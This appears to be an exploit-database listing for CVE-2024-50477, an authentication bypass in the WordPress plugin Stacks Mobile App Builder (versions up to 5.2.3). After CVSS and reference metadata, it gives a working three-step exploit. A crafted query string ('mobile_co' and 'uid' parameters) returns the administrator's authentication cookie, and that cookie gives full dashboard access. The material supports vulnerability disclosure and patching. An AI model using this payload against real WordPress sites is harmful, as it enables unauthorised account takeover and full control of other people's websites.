Stacks Mobile App Builder 5.2.3 – Authentication Bypass via Account Takeover

July 8, 2025 invoker category_exploit

Exploit Details

Basic Information

Exploit Title Stacks Mobile App Builder 5.2.3 – Authentication Bypass via Account Takeover
Exploit ID EDB-ID:52357
Type exploitdb
Published 2025-07-08T00:00:00
Modified 2025-07-08T00:00:00

CVSS Information

CVSS Score 9.8
Severity CRITICAL
Vector CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

CVE Information

  • CVE-2024-50477

Exploit Description

Exploit Title: Stacks Mobile App Builder…

Exploit Code

# Exploit Title: Stacks Mobile App Builder 5.2.3 – Authentication Bypass via Account Takeover

# Date: October 25, 2024

# Exploit Author: stealthcopter

# Vendor Homepage: https://stacksmarket.co/

# Software Link: https://wordpress.org/plugins/stacks-mobile-app-builder/

# Version: <= 5.2.3
# Tested on: Ubuntu 24.10/Docker

# CVE: CVE-2024-50477

# References:

# – https://github.com/stealthcopter/wordpress-hacking/blob/main/reports/stacks-mobile-app-builder-priv-esc/stacks-mobile-app-builder-priv-esc.md

# – https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/stacks-mobile-app-builder/stacks-mobile-app-builder-523-authentication-bypass-via-account-takeover

1. Navigate to the target site and append the following query parameters to the URL to impersonate the user with ID `1`:

`/?mobile_co=1&uid=1`

2. You will now receive an authentication cookie for the specified user ID (typically, user ID `1` is the site administrator).

3. Visit `/wp-admin` — you should have full access to the admin dashboard.

View Full Exploit Details

💭 Join the Security Discussion

🔒 Your email address will not be published. Required fields are marked *

⚠️ Please be respectful and constructive in your comments. Security discussions should remain professional.